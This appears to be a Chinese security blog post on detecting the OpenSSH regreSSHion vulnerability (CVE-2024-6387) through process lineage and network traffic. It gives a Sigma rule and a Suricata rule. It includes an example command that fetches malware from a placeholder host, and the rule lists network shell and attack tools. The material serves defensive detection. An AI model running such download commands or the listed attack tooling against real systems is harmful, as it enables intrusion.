检测OpenSSH远程代码执行漏洞CVE-2024-6387(行为和流量)
2024-7-3 11:26:18 Author: mp.weixin.qq.com(查看原文) 阅读量:23 收藏

背景:

Qualys团队在OpenSSH服务器(sshd)中发现了一个漏洞(信号处理程序竞争条件):如果客户端未能在LoginGraceTime秒内完成身份验证(默认为120秒,旧版OpenSSH为600秒),sshd的SIGALRM处理程序会被异步调用,但这个信号处理程序会调用各种非异步信号安全的函数(例如syslog())。这个竞争条件影响了默认配置下的sshd。经过调查,我们发现这个漏洞实际上是2006年由Mark Dowd报告的CVE-2006-5051("OpenSSH 4.4版本之前的信号处理程序竞争条件允许远程攻击者导致拒绝服务(崩溃),并可能执行任意代码")的重现。
简而言之:如果客户端在LoginGraceTime期间内未能完成身份验证,OpenSSH的SIGALRM信号处理程序中会出现竞争条件。当SIGALRM被触发时,它会使用不安全的异步函数来执行存储在内存中的代码。这个漏洞通过竞争条件造成内存损坏,从而使信号处理程序执行攻击者的代码而非预期代码。

1.行为

execve

在编写Linux检测内容时,理解execve的工作原理至关重要。虽然深入探讨可以留待以后,但了解基础知识对我们的目的来说已经足够了。以下是man页面对execve系统调用的描述:

execve()执行由filename指向的程序。filename必须是二进制可执行文件,或者以以下形式开头的脚本:

这意味着当你在shell中输入类似./exp的命令时,你实际上是在对相关的二进制文件或脚本调用execve系统调用,从而启动进程。这个动作通常会被auditd等工具记录。auditd生成的进程执行日志可以被视为类似于Windows事件ID 4688,后者记录进程创建事件。

整合检测策略

让我们回顾一下我们所知道的:

1. RegreSSHion(CVE-2024-6387)利用竞争条件在内存中执行shellcode。

2. shellcode将存储在sshd进程内存中,很可能包含某种形式的execve来执行命令或代码。

3. 由于sshd执行恶意shellcode,调用新进程,sshd很可能是被执行内容的父进程。

父进程关系是一个有用的检测组合,我们将用它来检测SSH的远程代码执行。

检测任何从sshd派生的shell会有问题,因为通常当你SSH进入系统时,会为你生成一个用于交互的shell。这是常见活动。然而,如果有人执行恶意bash命令,比如bash -c "wget https://xxx.com/malware",它会导致wget作为sshd的子进程出现。

父进程关系解释

当你执行bash -c "wget https://xxx.com/malware"时,sshd是启动用户会话并生成初始shell的父进程。在这种情况下,bash使用-c选项执行作为字符串提供的命令。一旦bash运行命令,它就会执行wget,但不会为它创建单独的父进程。因此,wget命令会显示为sshd的直接子进程,而不是bash的。这是因为bash -c在当前shell的上下文中执行命令,而该shell仍然是sshd的子进程。

Sigma规则

由于shell本身作为子进程太常见,仅凭SSH的工作方式无法检测,我们可以转而检测那些不太常见但可能需要执行的操作,比如下载第二阶段恶意软件或攻击工具,或者执行它们。考虑到这一点,我们可以创建一个Sigma规则来检测这种活动:

title: 检测SSH/SSHD的可疑子进程或命令description: 检测SSH/SSHD的可疑子进程或由SSH/SSHD执行的命令,这可能表明存在使用常见Linux攻击工具或网络二进制文件进行潜在滥用的情况。
references: - https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt - https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-servertags: - attack.t1190logsource: category: process_creation product: linuxdetection: selection_process: ParentImage: - '/usr/bin/ssh' - '/usr/sbin/sshd' Image: - '/usr/bin/curl' - '/usr/bin/wget' - '/usr/bin/nmap' - '/usr/bin/nc' - '/usr/bin/socat' - '/usr/bin/nc.traditional' - '/usr/bin/nc.openbsd' - '/usr/bin/openssl' - '/usr/bin/nc6' - '/usr/bin/msfconsole' selection_commandline: ParentImage: - '/usr/bin/ssh' - '/usr/sbin/sshd' CommandLine|contains: - 'nmap' - 'chisel' - 'zenmap' - 'xenmap' - 'john' - 'hydra' - 'sqlmap' - 'dirbuster' - 'nikto' - 'gobuster' - 'feroxbuster' - 'masscan' - 'metasploit' - 'empire' condition: selection_process or selection_commandlinefalsepositives: - Expected administrative activity - Regular user behavior with legitimate use caseslevel: medium

需要注意的是,虽然这可能会捕获大量的利用活动,但这个检测器并非万无一失,攻击者可能会规避它,部署时应该牢记这一点。

2.流量(Snort/Suricata检测规则)

alert ssh any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Server Responded with Vulnerable OpenSSH Version (CVE-2024-6387)"; flow:established,to_client; content:"SSH-"; startswith; content:"-OpenSSH_"; fast_pattern; pcre:"/^(?:[123]|4\.(?:[0123](?:p\d)?|4[^p])|8\.(?:[6789](?:p\d)?|5(?:p[^1])?)|9\.(?:[01234567](?:p\d)?|8[^p]))(?:\.\d)*(?:\d|p\d)*/R"; reference:cve,2024-6387; reference:url,blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server; classtype:successful-recon-largescale; sid:2054218; rev:2; metadata:attack_target Client_and_Server, created_at 2024_07_01, cve CVE_2024_6387, deployment Perimeter, deployment Internal, former_category EXPLOIT, performance_impact Significant, signature_severity Informational, updated_at 2024_07_02, former_sid 2857461, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)

推荐阅读

闲谈

  1. 中国网络安全行业出了什么问题?

  2. 国内威胁情报行业的五大“悲哀”

  3. 安全产品的终局


威胁情报

1.威胁情报 - 最危险的网络安全工作
2.威胁情报专栏 | 威胁情报这十年(前传)
3.网络威胁情报的未来
4.情报内生?| 利用威胁情报平台落地网空杀伤链的七种方法
5.威胁情报专栏 | 特别策划 - 网空杀伤链

APT

  1. XZ计划中的后门手法 - “NOBUS”

  2. 十个常见的归因偏见(上)

  3. 抓APT的一点故事

  4. 揭秘三角行动(Operation Triangulation)一

  5. 闲话APT报告生产与消费

  6. 一名TAO黑客的网络安全之旅

  7. NSA TAO负责人警告私营部门不要搞“黑回去”


入侵分析与红队攻防

  1. 入侵分析与痛苦金字塔

  2. 资深红队专家谈EDR的工作原理与规避


天御智库

  1. 独家研判:五眼情报机构黑客纷纷浮出水面

  2. 美军前出狩猎并不孤单,美国网络外交局优先事项分析

  3. 《国际关系中的网络冲突》


文章来源: https://mp.weixin.qq.com/s?__biz=MzU0MzgyMzM2Nw==&mid=2247485846&idx=1&sn=81c0d5ae32735444d61b8ea24f839dea&chksm=fb04cafecc7343e85076ace5178b5efa651156f3e48cc682c3b01997e4bee934a0b953ca87da&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh